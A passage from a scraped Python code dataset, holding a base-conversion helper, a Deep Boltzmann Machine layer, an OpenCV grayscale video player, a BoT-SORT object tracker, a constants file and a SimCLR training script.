\"\"\"\r\n    if num == 0:\r\n        return '0'\r\n    if add != 0:\r\n        # a non-zero 'add' overrides n: convert num to base 'add' instead\r\n        return convert_base(num, add)\r\n    new_num_string = ''\r\n    current = num\r\n    while current != 0:\r\n        remainder = current % n\r\n        if 10 <= remainder <= 15:\r\n            remainder_string = HEX_CHARS[remainder]\r\n        elif remainder > 15:\r\n            # digits beyond 'F' have no single-character form; wrap them\r\n            remainder_string = '(' + str(remainder) + ')'\r\n        else:\r\n            remainder_string = str(remainder)\r\n        new_num_string = remainder_string + new_num_string\r\n        current //= n\r\n    return new_num_string\r\n\r\ndef factorial(num):\r\n    \"\"\"Get the factorial of a number\"\"\"\r\n    return math.factorial(num)\r\n","sub_path":"maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"475375779","text":"\"\"\"Implements a layer of a Deep Boltzmann Machine.\"\"\"\nfrom layer import *\nimport pdb\n\nclass DBMLayer(Layer):\n\n  def __init__(self, *args, **kwargs):\n    self.phases_tied = False\n    self.suff_stats = None\n    self.learn_precision = False\n    self.pos_phase = True\n    self.sample_input = False\n    super(DBMLayer, self).__init__(*args, **kwargs)\n    self.is_initialized = self.proto.is_initialized\n\n  def LoadParams(self, proto):\n    super(DBMLayer, self).LoadParams(proto)\n    self.suff_stats = cm.empty((proto.numlabels * proto.dimensions, 1))\n    self.learn_precision = self.activation == deepnet_pb2.Hyperparams.LINEAR and self.hyperparams.learn_precision\n    if self.learn_precision:\n      self.suff_stats2 = cm.empty((proto.numlabels * proto.dimensions, 1))\n    self.fig_neg = visualize.GetFigId()\n    self.fig_precision = visualize.GetFigId()\n    self.sample_input = self.hyperparams.sample_input\n  \n  def Show(self):\n    \"\"\"Displays useful statistics about the layer.\"\"\"\n    if not self.proto.hyperparams.enable_display:\n      return\n    if self.is_input:\n      visualize.display_hidden(self.data.asarray(), self.fig, title=self.name)\n      #visualize.display_w(self.neg_state.asarray(), self.proto.shape[0],\n      #          10, self.batchsize/10, self.fig, title='data')\n      #visualize.display_w(self.params['bias'].asarray(),\n      #          self.proto.shape[0], 1, 1, self.fig,\n      #          title='bias')\n      #visualize.display_w(self.params['precision'].asarray(),\n      #          self.proto.shape[0], 1, 1, self.fig_precision,\n      #          title='precision')\n    else:\n      visualize.display_hidden(self.pos_state.asarray(), self.fig_neg, title=self.name + \"_positive\")\n      #visualize.display_hidden(self.neg_state.asarray(), 2*self.fig_neg, title=self.name + \"_negative\")\n      \"\"\"\n      visualize.display_w(self.pos_state.asarray(), self.proto.shape[0],\n                self.batchsize, 1, self.fig,\n                title=self.name + \"_positive\", vmin=0, vmax=1)\n      visualize.display_w(self.neg_sample.asarray(), self.proto.shape[0],\n                self.batchsize, 1, self.fig_neg,\n                title=self.name + \"_negative\", vmin=0, vmax=1)\n      \"\"\"\n  def SetPhase(self, pos=True):\n    \"\"\"Setup required before starting a phase.\n\n    This method makes 'state' and 'sample' point to the right variable depending\n    on the phase.\n    \"\"\"\n    logging.debug('SetPhase in %s', self.name)\n    if pos:\n      self.pos_phase = True\n      self.state = self.pos_state\n      self.sample = self.pos_sample\n    else:\n      self.pos_phase = False\n      self.state = self.neg_state\n      self.sample = self.neg_sample\n\n  def TiePhases(self):\n    \"\"\"Ties the variables used in pos and neg phases.\n\n    This is done to save memory when doing CD. 
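Quick sanity checks for the fixed convert_base above (digits 10-15 use A-F, larger digits fall back to the parenthesized decimal form, and zero maps to '0'):

assert convert_base(255, 16) == 'FF'
assert convert_base(10, 2) == '1010'
assert convert_base(0, 8) == '0'
assert convert_base(20, 20) == '10'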
Since the Markov chain is not run\n persistently, the neg state need not be preserved after each cycle.\n \"\"\"\n self.phases_tied = True\n if self.neg_state != self.pos_state:\n self.neg_state.free_device_memory()\n self.neg_state = self.pos_state\n if self.neg_sample != self.pos_sample:\n self.neg_sample.free_device_memory()\n self.neg_sample = self.pos_sample\n\n def InitializeNegPhase(self, to_pos=False):\n \"\"\"Initialize negative particles.\n\n Copies the pos state and samples it to initialize the ngative particles.\n \"\"\"\n self.SetPhase(pos=False)\n if to_pos:\n self.state.assign(self.pos_state)\n else:\n self.ResetState(rand=True)\n self.Sample()\n self.SetPhase(pos=True)\n\n def AllocateBatchsizeDependentMemory(self, batchsize):\n super(DBMLayer, self).AllocateBatchsizeDependentMemory(batchsize)\n\n # self.state and self.deriv were allocated in super but they are not needed\n # for DBMs, so we re-interpret them as:\n self.pos_state = self.state\n self.pos_sample = self.deriv\n self.sample = self.pos_sample\n\n # Allocate variables for negative state.\n if self.phases_tied:\n self.neg_state = self.pos_state\n self.neg_sample = self.pos_sample\n else:\n self.neg_state = cm.CUDAMatrix(np.zeros((self.numlabels * self.dimensions,\n batchsize)))\n self.neg_sample = cm.CUDAMatrix(np.zeros((self.numlabels * self.dimensions,\n batchsize)))\n\n def ComputeUp(self, train=False, recon=False, step=0, maxsteps=0):\n \"\"\"\n Computes the state of a layer, given the state of its incoming neighbours.\n\n Args:\n train: True if this computation is happening during training, False during\n evaluation.\n recon: If True, the input layer will be reconstructed from the model and\n the error will be reported. If False, this will not happen.\n step: Training step.\n maxsteps: Maximum number of steps that will be taken (Some hyperparameters\n may depend on this.)\n \"\"\"\n logging.debug('ComputeUp in %s', self.name)\n if self.is_input and self.pos_phase and not recon:\n self.GetData()\n else:\n for i, edge in enumerate(self.incoming_edge):\n neighbour = self.incoming_neighbour[i]\n if self.pos_phase:\n # Mean field in pos phase\n inputs = neighbour.state\n else:\n # Gibbs sampling in neg phase\n inputs = neighbour.sample\n if edge.node2 == self:\n w = edge.params['weight'].T\n factor = edge.proto.up_factor\n else:\n w = edge.params['weight']\n factor = edge.proto.down_factor\n if i == 0:\n cm.dot(w, inputs, target=self.state)\n if factor != 1:\n self.state.mult(factor)\n else:\n self.state.add_dot(w, inputs, mult=factor)\n b = self.params['bias']\n if self.replicated_neighbour is None:\n self.state.add_col_vec(b)\n else:\n self.state.add_dot(b, self.replicated_neighbour.NN)\n self.ApplyActivation()\n if self.hyperparams.dropout:\n if train and maxsteps - step >= self.hyperparams.stop_dropout_for_last:\n # Randomly set states to zero.\n if self.pos_phase:\n self.mask.fill_with_rand()\n self.mask.greater_than(self.hyperparams.dropout_prob)\n self.state.mult(self.mask)\n else:\n # Produce expected output.\n self.state.mult(1.0 - self.hyperparams.dropout_prob)\n\n def AddSparsityGradient(self):\n h = self.hyperparams\n damping = h.sparsity_damping\n target = h.sparsity_target\n cost = h.sparsity_cost\n\n # Update \\hat{\\rho}.\n self.means.mult(damping)\n self.means.add_mult(self.suff_stats, alpha=(1-damping)/self.batchsize)\n\n # Compute gradient.\n self.means_temp2.assign(1)\n if self.activation == deepnet_pb2.Hyperparams.LOGISTIC:\n self.means_temp2.subtract(self.means)\n 
self.means_temp2.mult(self.means)\n elif self.activation == deepnet_pb2.Hyperparams.TANH:\n self.means_temp2.subtract(self.means, target=self.means_temp)\n self.means_temp2.add(self.means)\n self.means_temp2.mult(self.means_temp)\n elif self.activation == deepnet_pb2.Hyperparams.RECTIFIED_LINEAR:\n self.means_temp2.assign(self.means)\n elif self.activation == deepnet_pb2.Hyperparams.RECTIFIED_LINEAR_SMOOTH:\n self.means_temp2.assign(self.means)\n\n self.means.subtract(target, target=self.means_temp)\n self.means_temp.divide(self.means_temp2)\n self.means_temp.mult(cost)\n\n # Add to the suff stats.\n self.suff_stats.add_mult(self.means_temp, alpha=-self.batchsize)\n\n def CollectSufficientStatistics(self):\n \"\"\"Collect sufficient statistics for this layer.\"\"\"\n logging.debug('Collecting suff stats %s', self.name)\n h = self.hyperparams\n\n if self.activation == deepnet_pb2.Hyperparams.REPLICATED_SOFTMAX:\n self.state.div_by_row(self.NN)\n\n if self.pos_phase:\n self.state.sum(axis=1, target=self.suff_stats)\n if h.sparsity:\n self.AddSparsityGradient()\n if self.learn_precision:\n temp = self.deriv\n b = self.params['bias']\n self.state.add_col_mult(b, mult=-1.0, target=temp)\n temp.mult(temp)\n temp.sum(axis=1, target=self.suff_stats2)\n else:\n self.suff_stats.add_sums(self.state, axis=1, mult=-1.0)\n if self.learn_precision:\n temp = self.deriv\n b = self.params['bias']\n self.state.add_col_mult(b, mult=-1.0, target=temp)\n temp.mult(temp)\n self.suff_stats2.add_sums(temp, axis=1, mult=-1.0)\n\n if self.activation == deepnet_pb2.Hyperparams.REPLICATED_SOFTMAX:\n self.state.mult_by_row(self.NN)\n\n if self.pos_phase and h.sparsity:\n return float(self.means.asarray().mean())\n\n def UpdateParams(self, step=0):\n \"\"\"Update parameters associated with this layer.\"\"\"\n logging.debug('UpdateParams in %s', self.name)\n h = self.hyperparams\n numcases = self.batchsize\n\n if h.epsilon_decay == deepnet_pb2.Hyperparams.NONE:\n epsilon = h.base_epsilon\n elif h.epsilon_decay == deepnet_pb2.Hyperparams.INVERSE_T:\n epsilon = h.base_epsilon / (1 + float(step) / h.epsilon_decay_half_life)\n elif h.epsilon_decay == deepnet_pb2.Hyperparams.EXPONENTIAL:\n epsilon = h.base_epsilon / np.power(2, float(step) / h.epsilon_decay_half_life)\n if step < h.start_learning_after:\n epsilon = 0.0\n\n if h.momentum_change_steps > step:\n f = float(step) / h.momentum_change_steps\n momentum = (1.0 - f) * h.initial_momentum + f * h.final_momentum\n else:\n momentum = h.final_momentum\n\n # Update bias.\n if self.learn_precision:\n p = self.params['precision']\n p.upper_bound(h.precision_upper_bound)\n self.suff_stats.mult(p)\n b = self.params['bias']\n #b_delta = self.params['grad_bias']\n b_delta = self.grad_bias\n b_delta.mult(momentum)\n b_delta.add_mult(self.suff_stats, 1.0 / numcases)\n if h.apply_l2_decay:\n b_delta.add_mult(b, -h.l2_decay)\n\n if self.learn_precision:\n p = self.params['precision']\n b.divide(p)\n b.add_mult(b_delta, epsilon)\n b.mult(p)\n else:\n b.add_mult(b_delta, epsilon)\n\n # Update precision.\n if self.learn_precision:\n p = self.params['precision']\n p_delta = self.params['grad_precision']\n p_delta.assign(0)\n for i, edge in enumerate(self.incoming_edge):\n inputs = edge.suff_stats\n temp = edge.temp\n if edge.node2 == self:\n w = edge.params['weight'].T\n else:\n w = edge.params['weight']\n inputs.mult(w, target=temp)\n p_delta.add_sums(temp, axis=1)\n p_delta.subtract(self.suff_stats2)\n p_delta.divide(p)\n p.add_mult(p_delta, h.precision_epsilon / numcases)\n 
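The sparsity machinery above keeps an exponential moving average of the mean activations and nudges it toward the target rate; the same update for logistic units, written in plain numpy (sketch):

import numpy as np

def sparsity_update(means, batch_mean, damping=0.9, target=0.1, cost=0.01):
    # rho_hat <- damping * rho_hat + (1 - damping) * current batch mean
    means = damping * means + (1 - damping) * batch_mean
    # penalty gradient, scaled by the logistic derivative rho_hat(1 - rho_hat)
    grad = cost * (means - target) / (means * (1 - means))
    return means, grad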
p.upper_bound(h.precision_upper_bound)\n      p.lower_bound(0)\n\n","sub_path":"deepnet/dbm_layer.py","file_name":"dbm_layer.py","file_ext":"py","file_size_in_byte":10760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"203332865","text":"import cv2\r\n\r\n# Open the saved video file\r\ncap = cv2.VideoCapture('output.avi')\r\n\r\n\r\nwhile(True):\r\n    # Read the next frame of the video\r\n    ret, img_color = cap.read()\r\n\r\n    # Stop when the read fails, i.e. the whole video has been played\r\n    if ret == False:\r\n        break\r\n\r\n    # Convert the captured frame to grayscale\r\n    img_gray = cv2.cvtColor(img_color, cv2.COLOR_BGR2GRAY)\r\n\r\n    # Show the captured frame in color\r\n    cv2.imshow(\"Color\", img_color)\r\n\r\n    # Show the captured frame in grayscale\r\n    cv2.imshow(\"Gray\", img_gray)\r\n\r\n\r\n    # Wait 1 ms for a key press; exit on ESC\r\n    if cv2.waitKey(1) & 0xff == 27:\r\n        break\r\n\r\n# Release the capture\r\ncap.release()\r\n\r\n\r\n# Close all windows\r\ncv2.destroyAllWindows()\r\n","sub_path":"ComputerVisionDrone/sources/openCV/videoIO/videoGrayLoad.py","file_name":"videoGrayLoad.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"85233541","text":"# Copyright (c) 2023 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nThis code is based on https://github.com/WWangYuHsiang/SMILEtrack/blob/main/BoT-SORT/tracker/bot_sort.py\n\"\"\"\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import deque\n\nfrom ..matching import jde_matching as matching\nfrom ..motion import GMC\nfrom .base_jde_tracker import TrackState, STrack\nfrom .base_jde_tracker import joint_stracks, sub_stracks, remove_duplicate_stracks\nfrom ..motion import KalmanFilter\n\n\nclass BOTSORTTracker(object):\n    \"\"\"\n    BOTSORT tracker, supports a single class\n\n    Args:\n        track_high_thresh (float): threshold above which detections drive the first association\n        track_low_thresh (float): threshold below which detections are discarded\n        new_track_thresh (float): minimum score for starting a new track\n        match_thresh (float): IoU threshold for association\n        track_buffer (int): frames a lost track is kept, default 30\n        min_box_area (float): minimum box area to keep\n        camera_motion (bool): whether to compensate camera motion, default False\n        cmc_method (str): camera motion compensation method, default sparseOptFlow\n        frame_rate (int): fps; buffer_size=int(frame_rate / 30.0 * track_buffer)\n    \"\"\"\n\n    def __init__(self,\n                 track_high_thresh=0.3,\n                 track_low_thresh=0.2,\n                 new_track_thresh=0.4,\n                 match_thresh=0.7,\n                 track_buffer=30,\n                 min_box_area=0,\n                 camera_motion=False,\n                 cmc_method='sparseOptFlow',\n                 frame_rate=30):\n\n        self.tracked_stracks = []  # type: list[STrack]\n        self.lost_stracks = []  # type: list[STrack]\n        self.removed_stracks = []  # type: list[STrack]\n\n        self.frame_id = 0\n\n        self.track_high_thresh = track_high_thresh\n        self.track_low_thresh = track_low_thresh\n        self.new_track_thresh = new_track_thresh\n        self.match_thresh = match_thresh\n        self.buffer_size = int(frame_rate / 30.0 * track_buffer)\n        
self.max_time_lost = self.buffer_size\n self.kalman_filter = KalmanFilter()\n self.min_box_area = min_box_area\n\n self.camera_motion = camera_motion\n self.gmc = GMC(method=cmc_method)\n\n def update(self, output_results, img=None):\n self.frame_id += 1\n activated_starcks = []\n refind_stracks = []\n lost_stracks = []\n removed_stracks = []\n\n if len(output_results):\n bboxes = output_results[:, 2:6]\n scores = output_results[:, 1]\n classes = output_results[:, 0]\n\n # Remove bad detections\n lowest_inds = scores > self.track_low_thresh\n bboxes = bboxes[lowest_inds]\n scores = scores[lowest_inds]\n classes = classes[lowest_inds]\n\n # Find high threshold detections\n remain_inds = scores > self.track_high_thresh\n dets = bboxes[remain_inds]\n scores_keep = scores[remain_inds]\n classes_keep = classes[remain_inds]\n\n else:\n bboxes = []\n scores = []\n classes = []\n dets = []\n scores_keep = []\n classes_keep = []\n\n if len(dets) > 0:\n '''Detections'''\n detections = [\n STrack(STrack.tlbr_to_tlwh(tlbr), s, c)\n for (tlbr, s, c) in zip(dets, scores_keep, classes_keep)\n ]\n else:\n detections = []\n ''' Add newly detected tracklets to tracked_stracks'''\n unconfirmed = []\n tracked_stracks = [] # type: list[STrack]\n for track in self.tracked_stracks:\n if not track.is_activated:\n unconfirmed.append(track)\n else:\n tracked_stracks.append(track)\n ''' Step 2: First association, with high score detection boxes'''\n strack_pool = joint_stracks(tracked_stracks, self.lost_stracks)\n\n # Predict the current location with KF\n STrack.multi_predict(strack_pool, self.kalman_filter)\n\n # Fix camera motion\n if self.camera_motion:\n warp = self.gmc.apply(img[0], dets)\n STrack.multi_gmc(strack_pool, warp)\n STrack.multi_gmc(unconfirmed, warp)\n\n # Associate with high score detection boxes\n ious_dists = matching.iou_distance(strack_pool, detections)\n matches, u_track, u_detection = matching.linear_assignment(\n ious_dists, thresh=self.match_thresh)\n\n for itracked, idet in matches:\n track = strack_pool[itracked]\n det = detections[idet]\n if track.state == TrackState.Tracked:\n track.update(detections[idet], self.frame_id)\n activated_starcks.append(track)\n else:\n track.re_activate(det, self.frame_id, new_id=False)\n refind_stracks.append(track)\n ''' Step 3: Second association, with low score detection boxes'''\n if len(scores):\n inds_high = scores < self.track_high_thresh\n inds_low = scores > self.track_low_thresh\n inds_second = np.logical_and(inds_low, inds_high)\n dets_second = bboxes[inds_second]\n scores_second = scores[inds_second]\n classes_second = classes[inds_second]\n else:\n dets_second = []\n scores_second = []\n classes_second = []\n\n # association the untrack to the low score detections\n if len(dets_second) > 0:\n '''Detections'''\n detections_second = [\n STrack(STrack.tlbr_to_tlwh(tlbr), s, c) for (tlbr, s, c) in\n zip(dets_second, scores_second, classes_second)\n ]\n else:\n detections_second = []\n\n r_tracked_stracks = [\n strack_pool[i] for i in u_track\n if strack_pool[i].state == TrackState.Tracked\n ]\n dists = matching.iou_distance(r_tracked_stracks, detections_second)\n matches, u_track, u_detection_second = matching.linear_assignment(\n dists, thresh=0.5)\n for itracked, idet in matches:\n track = r_tracked_stracks[itracked]\n det = detections_second[idet]\n if track.state == TrackState.Tracked:\n track.update(det, self.frame_id)\n activated_starcks.append(track)\n else:\n track.re_activate(det, self.frame_id, new_id=False)\n 
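# a previously lost track was matched again; record it as re-found\n 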
refind_stracks.append(track)\n\n for it in u_track:\n track = r_tracked_stracks[it]\n if not track.state == TrackState.Lost:\n track.mark_lost()\n lost_stracks.append(track)\n '''Deal with unconfirmed tracks, usually tracks with only one beginning frame'''\n detections = [detections[i] for i in u_detection]\n dists = matching.iou_distance(unconfirmed, detections)\n\n matches, u_unconfirmed, u_detection = matching.linear_assignment(\n dists, thresh=0.7)\n for itracked, idet in matches:\n unconfirmed[itracked].update(detections[idet], self.frame_id)\n activated_starcks.append(unconfirmed[itracked])\n for it in u_unconfirmed:\n track = unconfirmed[it]\n track.mark_removed()\n removed_stracks.append(track)\n \"\"\" Step 4: Init new stracks\"\"\"\n for inew in u_detection:\n track = detections[inew]\n if track.score < self.new_track_thresh:\n continue\n\n track.activate(self.kalman_filter, self.frame_id)\n activated_starcks.append(track)\n \"\"\" Step 5: Update state\"\"\"\n for track in self.lost_stracks:\n if self.frame_id - track.end_frame > self.max_time_lost:\n track.mark_removed()\n removed_stracks.append(track)\n \"\"\" Merge \"\"\"\n self.tracked_stracks = [\n t for t in self.tracked_stracks if t.state == TrackState.Tracked\n ]\n self.tracked_stracks = joint_stracks(self.tracked_stracks,\n activated_starcks)\n self.tracked_stracks = joint_stracks(self.tracked_stracks,\n refind_stracks)\n self.lost_stracks = sub_stracks(self.lost_stracks, self.tracked_stracks)\n self.lost_stracks.extend(lost_stracks)\n self.lost_stracks = sub_stracks(self.lost_stracks, self.removed_stracks)\n self.removed_stracks.extend(removed_stracks)\n self.tracked_stracks, self.lost_stracks = remove_duplicate_stracks(\n self.tracked_stracks, self.lost_stracks)\n\n # output_stracks = [track for track in self.tracked_stracks if track.is_activated]\n output_stracks = [track for track in self.tracked_stracks]\n\n return output_stracks\n","sub_path":"deploy/pptracking/python/mot/tracker/botsort_tracker.py","file_name":"botsort_tracker.py","file_ext":"py","file_size_in_byte":9402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"121080714","text":"import os\n\nappVersion = 106\n\ncached_dir = \".cached\"\nif not os.path.isdir(cached_dir):\n os.mkdir(cached_dir)\n\ndb_top_dir = \".db\"\nif not os.path.isdir(db_top_dir):\n os.mkdir(db_top_dir)\n\nfirst_run_dir = \".first_run\"\nif not os.path.isdir(first_run_dir):\n os.mkdir(first_run_dir)\n\nguanjia_skey_version = 2\n","sub_path":"const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"234817779","text":"import argparse\nimport os\n\nimport pandas as pd\nimport torch\nimport torch.optim as optim\nfrom thop import profile, clever_format\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom PIL import Image\nfrom torchvision import transforms\nfrom torchvision import datasets\n\nfrom model import Model\n\n\n# train for one epoch to learn unique features\ndef train(net, data_loader, train_optimizer):\n net.train()\n total_loss, total_num, train_bar = 0.0, 0, tqdm(data_loader)\n for pos_1, pos_2, target in tqdm(data_loader):\n pos_1, pos_2 = pos_1.to(device), pos_2.to(device)\n # print('pos_1 :', pos_1.shape[0])\n # print('pos_2 :', pos_2.shape)\n feature_1, out_1 = net(pos_1)\n feature_2, out_2 = net(pos_2)\n # print('out_1 :', out_1.shape)\n # print('out_2 :', out_2.shape)\n # [2*B, 
D]\n out = torch.cat([out_1, out_2], dim=0)\n # print('out :', out.shape)\n # [2*B, 2*B]\n sim_matrix = torch.exp(torch.mm(out, out.t().contiguous()) / temperature)\n # print(torch.ones_like(sim_matrix).shape)\n # print(torch.eye(2*batch_size).shape)\n mask = (torch.ones_like(sim_matrix) - torch.eye(2 * pos_1.shape[0], device=sim_matrix.device)).bool()\n # [2*B, 2*B-1]\n sim_matrix = sim_matrix.masked_select(mask).view(2 * pos_1.shape[0], -1)\n\n # compute loss\n pos_sim = torch.exp(torch.sum(out_1 * out_2, dim=-1) / temperature)\n # [2*B]\n pos_sim = torch.cat([pos_sim, pos_sim], dim=0)\n loss = (- torch.log(pos_sim / sim_matrix.sum(dim=-1))).mean()\n train_optimizer.zero_grad()\n loss.backward()\n train_optimizer.step()\n\n total_num += batch_size\n total_loss += loss.item() * batch_size\n train_bar.set_description('Train Epoch: [{}/{}] Loss: {:.4f}'.format(epoch, epochs, total_loss / total_num))\n\n return total_loss / total_num\n\n\n# test for one epoch, use weighted knn to find the most similar images' label to assign the test image\ndef test(net, memory_data_loader, test_data_loader):\n net.eval()\n total_top1, total_top5, total_num, feature_bank, target_vec = 0.0, 0.0, 0, [], []\n with torch.no_grad():\n # generate feature bank\n for data, _, target in tqdm(memory_data_loader, desc='Feature extracting'):\n feature, out = net(data.to(device))\n feature_bank.append(feature)\n target_vec.append(target)\n # [D, N]\n feature_bank = torch.cat(feature_bank, dim=0).t().contiguous()\n target_vec = torch.cat(target_vec, dim=0).t().contiguous()\n # [N]\n # classes = memory_data_loader.dataset.classes\n # map = {'pouring':0, 'not_pouring':1}\n feature_labels = torch.tensor(target_vec, device=feature_bank.device)\n # loop test data to predict the label by weighted knn search\n test_bar = tqdm(test_data_loader)\n for data, _, target in test_bar:\n data, target = data.to(device), target.to(device)\n feature, out = net(data)\n\n total_num += data.size(0)\n # compute cos similarity between each feature vector and feature bank ---> [B, N]\n sim_matrix = torch.mm(feature, feature_bank)\n # [B, K]\n sim_weight, sim_indices = sim_matrix.topk(k=k, dim=-1)\n # [B, K]\n sim_labels = torch.gather(feature_labels.expand(data.size(0), -1), dim=-1, index=sim_indices)\n sim_weight = (sim_weight / temperature).exp()\n\n # counts for each class\n one_hot_label = torch.zeros(data.size(0) * k, c, device=sim_labels.device)\n # [B*K, C]\n one_hot_label = one_hot_label.scatter(dim=-1, index=sim_labels.view(-1, 1), value=1.0)\n # weighted score ---> [B, C]\n pred_scores = torch.sum(one_hot_label.view(data.size(0), -1, c) * sim_weight.unsqueeze(dim=-1), dim=1)\n\n pred_labels = pred_scores.argsort(dim=-1, descending=True)\n total_top1 += torch.sum((pred_labels[:, :1] == target.unsqueeze(dim=-1)).any(dim=-1).float()).item()\n total_top5 += torch.sum((pred_labels[:, :5] == target.unsqueeze(dim=-1)).any(dim=-1).float()).item()\n test_bar.set_description('Test Epoch: [{}/{}] Acc@1:{:.2f}% Acc@5:{:.2f}%'\n .format(epoch, epochs, total_top1 / total_num * 100, total_top5 / total_num * 100))\n\n return total_top1 / total_num * 100, total_top5 / total_num * 100\n\n\nclass SimCLR_Dataset(torch.utils.data.Dataset):\n # print('Inside wrapper')\n '''Dataset Wrapper for SimCLR'''\n\n def __init__(self, data, transform, root, train=True):\n self.data = data\n self.transform = transform\n self.train = train\n self.root = root\n self.classes = self._get_classes(self.root)\n\n def __getitem__(self, index):\n img, target = 
self.data[index]\n\n pos_1 = self.transform(img)\n pos_2 = self.transform(img)\n\n return pos_1, pos_2, target\n\n def __len__(self):\n return len(self.data)\n\n def _get_classes(self, dir):\n classes = [d.name for d in os.scandir(dir)]\n return classes\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Train SimCLR')\n parser.add_argument('--dir_path', default='/sandbox_classification_data', type=str, help='Data directory')\n parser.add_argument('--feature_dim', default=128, type=int, help='Feature dim for latent vector')\n parser.add_argument('--temperature', default=0.5, type=float, help='Temperature used in softmax')\n parser.add_argument('--k', default=200, type=int, help='Top k most similar images used to predict the label')\n parser.add_argument('--batch_size', default=512, type=int, help='Number of images in each mini-batch')\n parser.add_argument('--epochs', default=100, type=int, help='Number of sweeps over the dataset to train')\n parser.add_argument('--resume', '-r', type=str, default='', help='Checkpoint path for resume / test.')\n\n # args parser\n args = parser.parse_args()\n #dir = args.dir_path\n feature_dim, temperature, k = args.feature_dim, args.temperature, args.k\n batch_size, epochs = args.batch_size, args.epochs\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(device)\n\n # data prepare\n\n train_transform = transforms.Compose([\n transforms.RandomResizedCrop(32),\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomApply([transforms.ColorJitter(0.4, 0.4, 0.4, 0.1)], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n transforms.ToTensor(),\n transforms.Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])])\n test_transform = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])])\n\n data_dir = args.dir_path\n traindir = os.path.join(data_dir, 'train/')\n valdir = os.path.join('/media/neo/krypton/data/data_ptc/pouring_classification_data/ptc_dataset/', 'val/')\n\n train_dataset = datasets.ImageFolder(traindir)\n train_dataset = SimCLR_Dataset(train_dataset, transform=train_transform, root=traindir, train=True)\n train_loader = DataLoader(\n train_dataset,\n batch_size=batch_size,\n num_workers=16,\n pin_memory=True\n )\n mem_dataset = datasets.ImageFolder(traindir)\n mem_dataset = SimCLR_Dataset(mem_dataset, transform=test_transform, root=traindir, train=False)\n memory_loader = DataLoader(\n mem_dataset,\n batch_size=int(batch_size*0.5),\n num_workers=16,\n shuffle = False,\n pin_memory=True\n )\n test_dataset = datasets.ImageFolder(valdir)\n test_dataset = SimCLR_Dataset(test_dataset,\n transform=test_transform,\n root=valdir,\n train=False)\n test_loader = DataLoader(\n test_dataset,\n batch_size=int(batch_size*0.5),\n num_workers=16,\n shuffle = False,\n pin_memory=True\n )\n\n # # memory_data = utils.CIFAR10Pair(root='data', train=True, transform=utils.test_transform, download=True)\n # memory_loader = DataLoader(memory_data, batch_size=batch_size, shuffle=False, num_workers=16, pin_memory=True)\n # test_data = utils.DataPair(root=data_dir, train =False, transfrom=utils.test_transform)\n # # test_data = utils.CIFAR10Pair(root='data', train=False, transform=utils.test_transform, download=True)\n # # test_loader = DataLoader(test_data, batch_size=batch_size, shuffle=False, num_workers=16, pin_memory=True)\n\n # model setup and optimizer config\n model = 
Model(feature_dim).to(device)\n flops, params = profile(model, inputs=(torch.randn(1, 3, 32, 32).to(device),))\n flops, params = clever_format([flops, params])\n print('# Model Params: {} FLOPs: {}'.format(params, flops))\n optimizer = optim.Adam(model.parameters(), lr=1e-3, weight_decay=1e-6)\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=len(train_loader), eta_min=0, last_epoch=-1)\n c = len(mem_dataset.classes)\n\n # training loop\n results = {'train_loss': [], 'test_acc@1': [], 'test_acc@5': []}\n save_name_pre = '{}_{}_{}_{}_{}'.format(feature_dim, temperature, k, batch_size, epochs)\n if not os.path.exists('results'):\n os.mkdir('results')\n best_acc = 0.0\n start_epoch = 1\n if args.resume:\n if os.path.isfile(args.resume):\n checkpoint = torch.load(args.resume)\n start_epoch = checkpoint['epoch'] + 1\n best_acc = checkpoint['best_acc']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n print('Model restored from epoch:', start_epoch)\n for epoch in range(start_epoch, epochs + 1):\n train_loss = train(model, train_loader, optimizer)\n scheduler.step()\n results['train_loss'].append(train_loss)\n test_acc_1, test_acc_5 = test(model, memory_loader, test_loader)\n results['test_acc@1'].append(test_acc_1)\n results['test_acc@5'].append(test_acc_5)\n if test_acc_1 > best_acc:\n best_acc = test_acc_1\n # save the best-performing weights whenever top-1 accuracy improves\n torch.save(model.state_dict(), 'results/iter_1/{}_model.pth'.format(save_name_pre))\n # save statistics\n data_frame = pd.DataFrame(data=results, index=range(1, epoch + 1))\n data_frame.to_csv('results/iter_1/{}_statistics.csv'.format(save_name_pre), index_label='epoch')\n checkpoint = {\n 'epoch': epoch,\n 'state_dict': model.state_dict(),\n 'best_acc': best_acc,\n 'optimizer': optimizer.state_dict(),\n }\n model.save(checkpoint, 'results/iter_1/{}_epoch_{}_checkpoint.pth'.format(save_name_pre,epoch))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
